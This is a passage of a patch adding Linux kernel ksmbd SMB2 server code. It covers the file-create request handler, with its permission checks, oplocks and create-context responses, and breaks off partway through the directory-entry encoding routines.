++		pr_err("Invalid create disposition : 0x%x\n",
++		       le32_to_cpu(req->CreateDisposition));
++		rc = -EINVAL;
++		goto err_out1;
++	}
++
++	if (!(req->DesiredAccess & DESIRED_ACCESS_MASK)) {
++		pr_err("Invalid desired access : 0x%x\n",
++		       le32_to_cpu(req->DesiredAccess));
++		rc = -EACCES;
++		goto err_out1;
++	}
++
++	if (req->FileAttributes && !(req->FileAttributes & FILE_ATTRIBUTE_MASK_LE)) {
++		pr_err("Invalid file attribute : 0x%x\n",
++		       le32_to_cpu(req->FileAttributes));
++		rc = -EINVAL;
++		goto err_out1;
++	}
++
++	if (req->CreateContextsOffset) {
++		/* Parse non-durable handle create contexts */
++		context = smb2_find_context_vals(req, SMB2_CREATE_EA_BUFFER, 4);
++		if (IS_ERR(context)) {
++			rc = PTR_ERR(context);
++			goto err_out1;
++		} else if (context) {
++			ea_buf = (struct create_ea_buf_req *)context;
++			if (le16_to_cpu(context->DataOffset) +
++			    le32_to_cpu(context->DataLength) <
++			    sizeof(struct create_ea_buf_req)) {
++				rc = -EINVAL;
++				goto err_out1;
++			}
++			if (req->CreateOptions & FILE_NO_EA_KNOWLEDGE_LE) {
++				rsp->hdr.Status = STATUS_ACCESS_DENIED;
++				rc = -EACCES;
++				goto err_out1;
++			}
++		}
++
++		context = smb2_find_context_vals(req,
++						 SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST, 4);
++		if (IS_ERR(context)) {
++			rc = PTR_ERR(context);
++			goto err_out1;
++		} else if (context) {
++			ksmbd_debug(SMB,
++				    "get query maximal access context\n");
++			maximal_access_ctxt = 1;
++		}
++
++		context = smb2_find_context_vals(req,
++						 SMB2_CREATE_TIMEWARP_REQUEST, 4);
++		if (IS_ERR(context)) {
++			rc = PTR_ERR(context);
++			goto err_out1;
++		} else if (context) {
++			ksmbd_debug(SMB, "get timewarp context\n");
++			rc = -EBADF;
++			goto err_out1;
++		}
++
++		if (tcon->posix_extensions) {
++			context = smb2_find_context_vals(req,
++							 SMB2_CREATE_TAG_POSIX, 16);
++			if (IS_ERR(context)) {
++				rc = PTR_ERR(context);
++				goto err_out1;
++			} else if (context) {
++				struct create_posix *posix =
++					(struct create_posix *)context;
++				if (le16_to_cpu(context->DataOffset) +
++				    le32_to_cpu(context->DataLength) <
++				    sizeof(struct create_posix) - 4) {
++					rc = -EINVAL;
++					goto err_out1;
++				}
++				ksmbd_debug(SMB, "get posix context\n");
++
++				posix_mode = le32_to_cpu(posix->Mode);
++				posix_ctxt = 1;
++			}
++		}
++	}
++
++	if (ksmbd_override_fsids(work)) {
++		rc = -ENOMEM;
++		goto err_out1;
++	}
++
++	rc = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, 1);
++	if (!rc) {
++		if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE) {
++			/*
++			 * If file exists with under flags, return access
++			 * denied error.
++			 */
++			if (req->CreateDisposition == FILE_OVERWRITE_IF_LE ||
++			    req->CreateDisposition == FILE_OPEN_IF_LE) {
++				rc = -EACCES;
++				path_put(&path);
++				goto err_out;
++			}
++
++			if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++				ksmbd_debug(SMB,
++					    "User does not have write permission\n");
++				rc = -EACCES;
++				path_put(&path);
++				goto err_out;
++			}
++		} else if (d_is_symlink(path.dentry)) {
++			rc = -EACCES;
++			path_put(&path);
++			goto err_out;
++		}
++	}
++
++	if (rc) {
++		if (rc != -ENOENT)
++			goto err_out;
++		ksmbd_debug(SMB, "can not get linux path for %s, rc = %d\n",
++			    name, rc);
++		rc = 0;
++	} else {
++		file_present = true;
++		user_ns = mnt_user_ns(path.mnt);
++	}
++	if (stream_name) {
++		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE) {
++			if (s_type == DATA_STREAM) {
++				rc = -EIO;
++				rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
++			}
++		} else {
++			if (file_present && S_ISDIR(d_inode(path.dentry)->i_mode) &&
++			    s_type == DATA_STREAM) {
++				rc = -EIO;
++				rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
++			}
++		}
++
++		if (req->CreateOptions & FILE_DIRECTORY_FILE_LE &&
++		    req->FileAttributes & FILE_ATTRIBUTE_NORMAL_LE) {
++			rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
++			rc = -EIO;
++		}
++
++		if (rc < 0)
++			goto err_out;
++	}
++
++	if (file_present && req->CreateOptions & FILE_NON_DIRECTORY_FILE_LE &&
++	    S_ISDIR(d_inode(path.dentry)->i_mode) &&
++	    !(req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
++		ksmbd_debug(SMB, "open() argument is a directory: %s, %x\n",
++			    name, req->CreateOptions);
++		rsp->hdr.Status = STATUS_FILE_IS_A_DIRECTORY;
++		rc = -EIO;
++		goto err_out;
++	}
++
++	if (file_present && (req->CreateOptions & FILE_DIRECTORY_FILE_LE) &&
++	    !(req->CreateDisposition == FILE_CREATE_LE) &&
++	    !S_ISDIR(d_inode(path.dentry)->i_mode)) {
++		rsp->hdr.Status = STATUS_NOT_A_DIRECTORY;
++		rc = -EIO;
++		goto err_out;
++	}
++
++	if (!stream_name && file_present &&
++	    req->CreateDisposition == FILE_CREATE_LE) {
++		rc = -EEXIST;
++		goto err_out;
++	}
++
++	daccess = smb_map_generic_desired_access(req->DesiredAccess);
++
++	if (file_present && !(req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
++		rc = smb_check_perm_dacl(conn, &path, &daccess,
++					 sess->user->uid);
++		if (rc)
++			goto err_out;
++	}
++
++	if (daccess & FILE_MAXIMAL_ACCESS_LE) {
++		if (!file_present) {
++			daccess = cpu_to_le32(GENERIC_ALL_FLAGS);
++		} else {
++			rc = ksmbd_vfs_query_maximal_access(user_ns,
++							    path.dentry,
++							    &daccess);
++			if (rc)
++				goto err_out;
++			already_permitted = true;
++		}
++		maximal_access = daccess;
++	}
++
++	open_flags = smb2_create_open_flags(file_present, daccess,
++					    req->CreateDisposition,
++					    &may_flags);
++
++	if (!test_tree_conn_flag(tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++		if (open_flags & O_CREAT) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			rc = -EACCES;
++			goto err_out;
++		}
++	}
++
++	/*create file if not present */
++	if (!file_present) {
++		rc = smb2_creat(work, &path, name, open_flags, posix_mode,
++				req->CreateOptions & FILE_DIRECTORY_FILE_LE);
++		if (rc) {
++			if (rc == -ENOENT) {
++				rc = -EIO;
++				rsp->hdr.Status = STATUS_OBJECT_PATH_NOT_FOUND;
++			}
++			goto err_out;
++		}
++
++		created = true;
++		user_ns = mnt_user_ns(path.mnt);
++		if (ea_buf) {
++			if (le32_to_cpu(ea_buf->ccontext.DataLength) <
++			    sizeof(struct smb2_ea_info)) {
++				rc = -EINVAL;
++				goto err_out;
++			}
++
++			rc = smb2_set_ea(&ea_buf->ea,
++					 le32_to_cpu(ea_buf->ccontext.DataLength),
++					 &path);
++			if (rc == -EOPNOTSUPP)
++				rc = 0;
++			else if (rc)
++				goto err_out;
++		}
++	} else if (!already_permitted) {
++		/* FILE_READ_ATTRIBUTE is allowed without inode_permission,
++		 * because execute(search) permission on a parent directory,
++		 * is already granted.
++		 */
++		if (daccess & ~(FILE_READ_ATTRIBUTES_LE | FILE_READ_CONTROL_LE)) {
++			rc = inode_permission(user_ns,
++					      d_inode(path.dentry),
++					      may_flags);
++			if (rc)
++				goto err_out;
++
++			if ((daccess & FILE_DELETE_LE) ||
++			    (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)) {
++				rc = ksmbd_vfs_may_delete(user_ns,
++							  path.dentry);
++				if (rc)
++					goto err_out;
++			}
++		}
++	}
++
++	rc = ksmbd_query_inode_status(d_inode(path.dentry->d_parent));
++	if (rc == KSMBD_INODE_STATUS_PENDING_DELETE) {
++		rc = -EBUSY;
++		goto err_out;
++	}
++
++	rc = 0;
++	filp = dentry_open(&path, open_flags, current_cred());
++	if (IS_ERR(filp)) {
++		rc = PTR_ERR(filp);
++		pr_err("dentry open for dir failed, rc %d\n", rc);
++		goto err_out;
++	}
++
++	if (file_present) {
++		if (!(open_flags & O_TRUNC))
++			file_info = FILE_OPENED;
++		else
++			file_info = FILE_OVERWRITTEN;
++
++		if ((req->CreateDisposition & FILE_CREATE_MASK_LE) ==
++		    FILE_SUPERSEDE_LE)
++			file_info = FILE_SUPERSEDED;
++	} else if (open_flags & O_CREAT) {
++		file_info = FILE_CREATED;
++	}
++
++	ksmbd_vfs_set_fadvise(filp, req->CreateOptions);
++
++	/* Obtain Volatile-ID */
++	fp = ksmbd_open_fd(work, filp);
++	if (IS_ERR(fp)) {
++		fput(filp);
++		rc = PTR_ERR(fp);
++		fp = NULL;
++		goto err_out;
++	}
++
++	/* Get Persistent-ID */
++	ksmbd_open_durable_fd(fp);
++	if (!has_file_id(fp->persistent_id)) {
++		rc = -ENOMEM;
++		goto err_out;
++	}
++
++	fp->cdoption = req->CreateDisposition;
++	fp->daccess = daccess;
++	fp->saccess = req->ShareAccess;
++	fp->coption = req->CreateOptions;
++
++	/* Set default windows and posix acls if creating new file */
++	if (created) {
++		int posix_acl_rc;
++		struct inode *inode = d_inode(path.dentry);
++
++		posix_acl_rc = ksmbd_vfs_inherit_posix_acl(user_ns,
++							   inode,
++							   d_inode(path.dentry->d_parent));
++		if (posix_acl_rc)
++			ksmbd_debug(SMB, "inherit posix acl failed : %d\n", posix_acl_rc);
++
++		if (test_share_config_flag(work->tcon->share_conf,
++					   KSMBD_SHARE_FLAG_ACL_XATTR)) {
++			rc = smb_inherit_dacl(conn, &path, sess->user->uid,
++					      sess->user->gid);
++		}
++
++		if (rc) {
++			rc = smb2_create_sd_buffer(work, req, &path);
++			if (rc) {
++				if (posix_acl_rc)
++					ksmbd_vfs_set_init_posix_acl(user_ns,
++								     inode);
++
++				if (test_share_config_flag(work->tcon->share_conf,
++							   KSMBD_SHARE_FLAG_ACL_XATTR)) {
++					struct smb_fattr fattr;
++					struct smb_ntsd *pntsd;
++					int pntsd_size, ace_num = 0;
++
++					ksmbd_acls_fattr(&fattr, user_ns, inode);
++					if (fattr.cf_acls)
++						ace_num = fattr.cf_acls->a_count;
++					if (fattr.cf_dacls)
++						ace_num += fattr.cf_dacls->a_count;
++
++					pntsd = kmalloc(sizeof(struct smb_ntsd) +
++							sizeof(struct smb_sid) * 3 +
++							sizeof(struct smb_acl) +
++							sizeof(struct smb_ace) * ace_num * 2,
++							GFP_KERNEL);
++					if (!pntsd) {
++						posix_acl_release(fattr.cf_acls);
++						posix_acl_release(fattr.cf_dacls);
++						goto err_out;
++					}
++
++					rc = build_sec_desc(user_ns,
++							    pntsd, NULL, 0,
++							    OWNER_SECINFO |
++							    GROUP_SECINFO |
++							    DACL_SECINFO,
++							    &pntsd_size, &fattr);
++					posix_acl_release(fattr.cf_acls);
++					posix_acl_release(fattr.cf_dacls);
++					if (rc) {
++						kfree(pntsd);
++						goto err_out;
++					}
++
++					rc = ksmbd_vfs_set_sd_xattr(conn,
++								    user_ns,
++								    path.dentry,
++								    pntsd,
++								    pntsd_size);
++					kfree(pntsd);
++					if (rc)
++						pr_err("failed to store ntacl in xattr : %d\n",
++						       rc);
++				}
++			}
++		}
++		rc = 0;
++	}
++
++	if (stream_name) {
++		rc = smb2_set_stream_name_xattr(&path,
++						fp,
++						stream_name,
++						s_type);
++		if (rc)
++			goto err_out;
++		file_info = FILE_CREATED;
++	}
++
++	fp->attrib_only = !(req->DesiredAccess & ~(FILE_READ_ATTRIBUTES_LE |
++			FILE_WRITE_ATTRIBUTES_LE | FILE_SYNCHRONIZE_LE));
++	if (!S_ISDIR(file_inode(filp)->i_mode) && open_flags & O_TRUNC &&
++	    !fp->attrib_only && !stream_name) {
++		smb_break_all_oplock(work, fp);
++		need_truncate = 1;
++	}
++
++	/* fp should be searchable through ksmbd_inode.m_fp_list
++	 * after daccess, saccess, attrib_only, and stream are
++	 * initialized.
++	 */
++	write_lock(&fp->f_ci->m_lock);
++	list_add(&fp->node, &fp->f_ci->m_fp_list);
++	write_unlock(&fp->f_ci->m_lock);
++
++	/* Check delete pending among previous fp before oplock break */
++	if (ksmbd_inode_pending_delete(fp)) {
++		rc = -EBUSY;
++		goto err_out;
++	}
++
++	share_ret = ksmbd_smb_check_shared_mode(fp->filp, fp);
++	if (!test_share_config_flag(work->tcon->share_conf, KSMBD_SHARE_FLAG_OPLOCKS) ||
++	    (req_op_level == SMB2_OPLOCK_LEVEL_LEASE &&
++	     !(conn->vals->capabilities & SMB2_GLOBAL_CAP_LEASING))) {
++		if (share_ret < 0 && !S_ISDIR(file_inode(fp->filp)->i_mode)) {
++			rc = share_ret;
++			goto err_out;
++		}
++	} else {
++		if (req_op_level == SMB2_OPLOCK_LEVEL_LEASE) {
++			req_op_level = smb2_map_lease_to_oplock(lc->req_state);
++			ksmbd_debug(SMB,
++				    "lease req for(%s) req oplock state 0x%x, lease state 0x%x\n",
++				    name, req_op_level, lc->req_state);
++			rc = find_same_lease_key(sess, fp->f_ci, lc);
++			if (rc)
++				goto err_out;
++		} else if (open_flags == O_RDONLY &&
++			   (req_op_level == SMB2_OPLOCK_LEVEL_BATCH ||
++			    req_op_level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
++			req_op_level = SMB2_OPLOCK_LEVEL_II;
++
++		rc = smb_grant_oplock(work, req_op_level,
++				      fp->persistent_id, fp,
++				      le32_to_cpu(req->hdr.Id.SyncId.TreeId),
++				      lc, share_ret);
++		if (rc < 0)
++			goto err_out;
++	}
++
++	if (req->CreateOptions & FILE_DELETE_ON_CLOSE_LE)
++		ksmbd_fd_set_delete_on_close(fp, file_info);
++
++	if (need_truncate) {
++		rc = smb2_create_truncate(&path);
++		if (rc)
++			goto err_out;
++	}
++
++	if (req->CreateContextsOffset) {
++		struct create_alloc_size_req *az_req;
++
++		az_req = (struct create_alloc_size_req *)smb2_find_context_vals(req,
++					SMB2_CREATE_ALLOCATION_SIZE, 4);
++		if (IS_ERR(az_req)) {
++			rc = PTR_ERR(az_req);
++			goto err_out;
++		} else if (az_req) {
++			loff_t alloc_size;
++			int err;
++
++			if (le16_to_cpu(az_req->ccontext.DataOffset) +
++			    le32_to_cpu(az_req->ccontext.DataLength) <
++			    sizeof(struct create_alloc_size_req)) {
++				rc = -EINVAL;
++				goto err_out;
++			}
++			alloc_size = le64_to_cpu(az_req->AllocationSize);
++			ksmbd_debug(SMB,
++				    "request smb2 create allocate size : %llu\n",
++				    alloc_size);
++			smb_break_all_levII_oplock(work, fp, 1);
++			err = vfs_fallocate(fp->filp, FALLOC_FL_KEEP_SIZE, 0,
++					    alloc_size);
++			if (err < 0)
++				ksmbd_debug(SMB,
++					    "vfs_fallocate is failed : %d\n",
++					    err);
++		}
++
++		context = smb2_find_context_vals(req, SMB2_CREATE_QUERY_ON_DISK_ID, 4);
++		if (IS_ERR(context)) {
++			rc = PTR_ERR(context);
++			goto err_out;
++		} else if (context) {
++			ksmbd_debug(SMB, "get query on disk id context\n");
++			query_disk_id = 1;
++		}
++	}
++
++	rc = ksmbd_vfs_getattr(&path, &stat);
++	if (rc)
++		goto err_out;
++
++	if (stat.result_mask & STATX_BTIME)
++		fp->create_time = ksmbd_UnixTimeToNT(stat.btime);
++	else
++		fp->create_time = ksmbd_UnixTimeToNT(stat.ctime);
++	if (req->FileAttributes || fp->f_ci->m_fattr == 0)
++		fp->f_ci->m_fattr =
++			cpu_to_le32(smb2_get_dos_mode(&stat, le32_to_cpu(req->FileAttributes)));
++
++	if (!created)
++		smb2_update_xattrs(tcon, &path, fp);
++	else
++		smb2_new_xattrs(tcon, &path, fp);
++
++	memcpy(fp->client_guid, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE);
++
++	rsp->StructureSize = cpu_to_le16(89);
++	rcu_read_lock();
++	opinfo = rcu_dereference(fp->f_opinfo);
++	rsp->OplockLevel = opinfo != NULL ? opinfo->level : 0;
++	rcu_read_unlock();
++	rsp->Flags = 0;
++	rsp->CreateAction = cpu_to_le32(file_info);
++	rsp->CreationTime = cpu_to_le64(fp->create_time);
++	time = ksmbd_UnixTimeToNT(stat.atime);
++	rsp->LastAccessTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.mtime);
++	rsp->LastWriteTime = cpu_to_le64(time);
++	time = ksmbd_UnixTimeToNT(stat.ctime);
++	rsp->ChangeTime = cpu_to_le64(time);
++	rsp->AllocationSize = S_ISDIR(stat.mode) ? 0 :
++		cpu_to_le64(stat.blocks << 9);
++	rsp->EndofFile = S_ISDIR(stat.mode) ? 0 : cpu_to_le64(stat.size);
++	rsp->FileAttributes = fp->f_ci->m_fattr;
++
++	rsp->Reserved2 = 0;
++
++	rsp->PersistentFileId = fp->persistent_id;
++	rsp->VolatileFileId = fp->volatile_id;
++
++	rsp->CreateContextsOffset = 0;
++	rsp->CreateContextsLength = 0;
++	inc_rfc1001_len(work->response_buf, 88); /* StructureSize - 1*/
++
++	/* If lease is request send lease context response */
++	if (opinfo && opinfo->is_lease) {
++		struct create_context *lease_ccontext;
++
++		ksmbd_debug(SMB, "lease granted on(%s) lease state 0x%x\n",
++			    name, opinfo->o_lease->state);
++		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_LEASE;
++
++		lease_ccontext = (struct create_context *)rsp->Buffer;
++		contxt_cnt++;
++		create_lease_buf(rsp->Buffer, opinfo->o_lease);
++		le32_add_cpu(&rsp->CreateContextsLength,
++			     conn->vals->create_lease_size);
++		inc_rfc1001_len(work->response_buf,
++				conn->vals->create_lease_size);
++		next_ptr = &lease_ccontext->Next;
++		next_off = conn->vals->create_lease_size;
++	}
++
++	if (maximal_access_ctxt) {
++		struct create_context *mxac_ccontext;
++
++		if (maximal_access == 0)
++			ksmbd_vfs_query_maximal_access(user_ns,
++						       path.dentry,
++						       &maximal_access);
++		mxac_ccontext = (struct create_context *)(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength));
++		contxt_cnt++;
++		create_mxac_rsp_buf(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength),
++				le32_to_cpu(maximal_access));
++		le32_add_cpu(&rsp->CreateContextsLength,
++			     conn->vals->create_mxac_size);
++		inc_rfc1001_len(work->response_buf,
++				conn->vals->create_mxac_size);
++		if (next_ptr)
++			*next_ptr = cpu_to_le32(next_off);
++		next_ptr = &mxac_ccontext->Next;
++		next_off = conn->vals->create_mxac_size;
++	}
++
++	if (query_disk_id) {
++		struct create_context *disk_id_ccontext;
++
++		disk_id_ccontext = (struct create_context *)(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength));
++		contxt_cnt++;
++		create_disk_id_rsp_buf(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength),
++				stat.ino, tcon->id);
++		le32_add_cpu(&rsp->CreateContextsLength,
++			     conn->vals->create_disk_id_size);
++		inc_rfc1001_len(work->response_buf,
++				conn->vals->create_disk_id_size);
++		if (next_ptr)
++			*next_ptr = cpu_to_le32(next_off);
++		next_ptr = &disk_id_ccontext->Next;
++		next_off = conn->vals->create_disk_id_size;
++	}
++
++	if (posix_ctxt) {
++		contxt_cnt++;
++		create_posix_rsp_buf(rsp->Buffer +
++				le32_to_cpu(rsp->CreateContextsLength),
++				fp);
++		le32_add_cpu(&rsp->CreateContextsLength,
++			     conn->vals->create_posix_size);
++		inc_rfc1001_len(work->response_buf,
++				conn->vals->create_posix_size);
++		if (next_ptr)
++			*next_ptr = cpu_to_le32(next_off);
++	}
++
++	if (contxt_cnt > 0) {
++		rsp->CreateContextsOffset =
++			cpu_to_le32(offsetof(struct smb2_create_rsp, Buffer));
++	}
++
++err_out:
++	if (file_present || created)
++		path_put(&path);
++	ksmbd_revert_fsids(work);
++err_out1:
++	if (rc) {
++		if (rc == -EINVAL)
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		else if (rc == -EOPNOTSUPP)
++			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++		else if (rc == -EACCES || rc == -ESTALE || rc == -EXDEV)
++			rsp->hdr.Status = STATUS_ACCESS_DENIED;
++		else if (rc == -ENOENT)
++			rsp->hdr.Status = STATUS_OBJECT_NAME_INVALID;
++		else if (rc == -EPERM)
++			rsp->hdr.Status = STATUS_SHARING_VIOLATION;
++		else if (rc == -EBUSY)
++			rsp->hdr.Status = STATUS_DELETE_PENDING;
++		else if (rc == -EBADF)
++			rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
++		else if (rc == -ENOEXEC)
++			rsp->hdr.Status = STATUS_DUPLICATE_OBJECTID;
++		else if (rc == -ENXIO)
++			rsp->hdr.Status = STATUS_NO_SUCH_DEVICE;
++		else if (rc == -EEXIST)
++			rsp->hdr.Status = STATUS_OBJECT_NAME_COLLISION;
++		else if (rc == -EMFILE)
++			rsp->hdr.Status = STATUS_INSUFFICIENT_RESOURCES;
++		if (!rsp->hdr.Status)
++			rsp->hdr.Status = STATUS_UNEXPECTED_IO_ERROR;
++
++		if (fp)
++			ksmbd_fd_put(work, fp);
++		smb2_set_err_rsp(work);
++		ksmbd_debug(SMB, "Error response: %x\n", rsp->hdr.Status);
++	}
++
++	kfree(name);
++	kfree(lc);
++
++	return 0;
++}
++
++static int readdir_info_level_struct_sz(int info_level)
++{
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++		return sizeof(struct file_full_directory_info);
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++		return sizeof(struct file_both_directory_info);
++	case FILE_DIRECTORY_INFORMATION:
++		return sizeof(struct file_directory_info);
++	case FILE_NAMES_INFORMATION:
++		return sizeof(struct file_names_info);
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++		return sizeof(struct file_id_full_dir_info);
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++		return sizeof(struct file_id_both_directory_info);
++	case SMB_FIND_FILE_POSIX_INFO:
++		return sizeof(struct smb2_posix_info);
++	default:
++		return -EOPNOTSUPP;
++	}
++}
++
++static int dentry_name(struct ksmbd_dir_info *d_info, int info_level)
++{
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_full_directory_info *ffdinfo;
++
++		ffdinfo = (struct file_full_directory_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(ffdinfo->NextEntryOffset);
++		d_info->name = ffdinfo->FileName;
++		d_info->name_len = le32_to_cpu(ffdinfo->FileNameLength);
++		return 0;
++	}
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_both_directory_info *fbdinfo;
++
++		fbdinfo = (struct file_both_directory_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(fbdinfo->NextEntryOffset);
++		d_info->name = fbdinfo->FileName;
++		d_info->name_len = le32_to_cpu(fbdinfo->FileNameLength);
++		return 0;
++	}
++	case FILE_DIRECTORY_INFORMATION:
++	{
++		struct file_directory_info *fdinfo;
++
++		fdinfo = (struct file_directory_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(fdinfo->NextEntryOffset);
++		d_info->name = fdinfo->FileName;
++		d_info->name_len = le32_to_cpu(fdinfo->FileNameLength);
++		return 0;
++	}
++	case FILE_NAMES_INFORMATION:
++	{
++		struct file_names_info *fninfo;
++
++		fninfo = (struct file_names_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(fninfo->NextEntryOffset);
++		d_info->name = fninfo->FileName;
++		d_info->name_len = le32_to_cpu(fninfo->FileNameLength);
++		return 0;
++	}
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_id_full_dir_info *dinfo;
++
++		dinfo = (struct file_id_full_dir_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(dinfo->NextEntryOffset);
++		d_info->name = dinfo->FileName;
++		d_info->name_len = le32_to_cpu(dinfo->FileNameLength);
++		return 0;
++	}
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_id_both_directory_info *fibdinfo;
++
++		fibdinfo = (struct file_id_both_directory_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(fibdinfo->NextEntryOffset);
++		d_info->name = fibdinfo->FileName;
++		d_info->name_len = le32_to_cpu(fibdinfo->FileNameLength);
++		return 0;
++	}
++	case SMB_FIND_FILE_POSIX_INFO:
++	{
++		struct smb2_posix_info *posix_info;
++
++		posix_info = (struct smb2_posix_info *)d_info->rptr;
++		d_info->rptr += le32_to_cpu(posix_info->NextEntryOffset);
++		d_info->name = posix_info->name;
++		d_info->name_len = le32_to_cpu(posix_info->name_len);
++		return 0;
++	}
++	default:
++		return -EINVAL;
++	}
++}
++
++/**
++ * smb2_populate_readdir_entry() - encode directory entry in smb2 response
++ * buffer
++ * @conn:	connection instance
++ * @info_level:	smb information level
++ * @d_info:	structure included variables for query dir
++ * @ksmbd_kstat:	ksmbd wrapper of dirent stat information
++ *
++ * if directory has many entries, find first can't read it fully.
++ * find next might be called multiple times to read remaining dir entries
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int smb2_populate_readdir_entry(struct ksmbd_conn *conn, int info_level,
++				       struct ksmbd_dir_info *d_info,
++				       struct ksmbd_kstat *ksmbd_kstat)
++{
++	int next_entry_offset = 0;
++	char *conv_name;
++	int conv_len;
++	void *kstat;
++	int struct_sz, rc = 0;
++
++	conv_name = ksmbd_convert_dir_info_name(d_info,
++						conn->local_nls,
++						&conv_len);
++	if (!conv_name)
++		return -ENOMEM;
++
++	/* Somehow the name has only terminating NULL bytes */
++	if (conv_len < 0) {
++		rc = -EINVAL;
++		goto free_conv_name;
++	}
++
++	struct_sz = readdir_info_level_struct_sz(info_level) - 1 + conv_len;
++	next_entry_offset = ALIGN(struct_sz, KSMBD_DIR_INFO_ALIGNMENT);
++	d_info->last_entry_off_align = next_entry_offset - struct_sz;
++
++	if (next_entry_offset > d_info->out_buf_len) {
++		d_info->out_buf_len = 0;
++		rc = -ENOSPC;
++		goto free_conv_name;
++	}
++
++	kstat = d_info->wptr;
++	if (info_level != FILE_NAMES_INFORMATION)
++		kstat = ksmbd_vfs_init_kstat(&d_info->wptr, ksmbd_kstat);
++
++	switch (info_level) {
++	case FILE_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_full_directory_info *ffdinfo;
++
++		ffdinfo = (struct file_full_directory_info *)kstat;
++		ffdinfo->FileNameLength = cpu_to_le32(conv_len);
++		ffdinfo->EaSize =
++			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
++		if (ffdinfo->EaSize)
++			ffdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			ffdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(ffdinfo->FileName, conv_name, conv_len);
++		ffdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_both_directory_info *fbdinfo;
++
++		fbdinfo = (struct file_both_directory_info *)kstat;
++		fbdinfo->FileNameLength = cpu_to_le32(conv_len);
++		fbdinfo->EaSize =
++			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
++		if (fbdinfo->EaSize)
++			fbdinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
++		fbdinfo->ShortNameLength = 0;
++		fbdinfo->Reserved = 0;
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			fbdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(fbdinfo->FileName, conv_name, conv_len);
++		fbdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_DIRECTORY_INFORMATION:
++	{
++		struct file_directory_info *fdinfo;
++
++		fdinfo = (struct file_directory_info *)kstat;
++		fdinfo->FileNameLength = cpu_to_le32(conv_len);
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			fdinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(fdinfo->FileName, conv_name, conv_len);
++		fdinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILE_NAMES_INFORMATION:
++	{
++		struct file_names_info *fninfo;
++
++		fninfo = (struct file_names_info *)kstat;
++		fninfo->FileNameLength = cpu_to_le32(conv_len);
++		memcpy(fninfo->FileName, conv_name, conv_len);
++		fninfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILEID_FULL_DIRECTORY_INFORMATION:
++	{
++		struct file_id_full_dir_info *dinfo;
++
++		dinfo = (struct file_id_full_dir_info *)kstat;
++		dinfo->FileNameLength = cpu_to_le32(conv_len);
++		dinfo->EaSize =
++			smb2_get_reparse_tag_special_file(ksmbd_kstat->kstat->mode);
++		if (dinfo->EaSize)
++			dinfo->ExtFileAttributes = FILE_ATTRIBUTE_REPARSE_POINT_LE;
++		dinfo->Reserved = 0;
++		dinfo->UniqueId = cpu_to_le64(ksmbd_kstat->kstat->ino);
++		if (d_info->hide_dot_file && d_info->name[0] == '.')
++			dinfo->ExtFileAttributes |= FILE_ATTRIBUTE_HIDDEN_LE;
++		memcpy(dinfo->FileName, conv_name, conv_len);
++		dinfo->NextEntryOffset = cpu_to_le32(next_entry_offset);
++		break;
++	}
++	case FILEID_BOTH_DIRECTORY_INFORMATION:
++	{
++		struct file_id_both_directory_info *fibdinfo;
++
++		fibdinfo = (struct file_id_both_directory_info *)kstat;
++		fibdinfo->FileNameLength = cpu_to_le32(conv_len);
